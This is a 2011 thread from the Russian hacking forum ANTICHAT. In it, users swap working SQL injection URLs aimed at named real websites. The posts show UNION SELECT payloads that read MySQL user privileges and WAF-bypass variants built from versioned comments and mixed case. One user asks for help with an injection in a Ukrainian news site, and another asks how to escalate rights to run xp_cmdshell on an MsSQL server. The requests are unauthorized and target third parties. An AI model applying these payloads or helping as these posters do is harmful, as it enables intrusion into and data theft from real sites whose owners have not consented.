ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.07.2011, 13:58
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от None
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us %20er+where+user=0x67625F6D69726F626F6577--+
Тогда уж так:
Сообщение от None
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=user()--+
|
|
|
07.07.2011, 13:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от XAMEHA
XAMEHA said:
Тогда уж так:
просто я извращенец
|
|
|
|
08.07.2011, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
280
Репутация:
0
|
|
У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876
С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.
|
|
|
|
08.07.2011, 02:02
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Сообщение от Sc0rpi0n
Sc0rpi0n said:
Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj
Помогите плиз
|
|
|
|
08.07.2011, 03:07
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
|
|
|
|
08.07.2011, 09:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию).
Все бы хорошо, но:
Сообщение от None
EXECUTE permission denied on object 'xp_cmdshell'
Как можно повысить себе права? Можте кто-то уже делал запрос?
Читал мануалы по мсскл, но не вкурил =( |
|
|
|
08.07.2011, 15:39
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263
|
|
|
|
08.07.2011, 16:24
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Sc0rpi0n
Sc0rpi0n said:
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263
http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+
|
|
|
|
09.07.2011, 00:09
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)
Код:
Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+
|
|
|
|
09.07.2011, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Sc0rpi0n
Sc0rpi0n said:
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)
Код:
Code:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+
Код:
Code:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
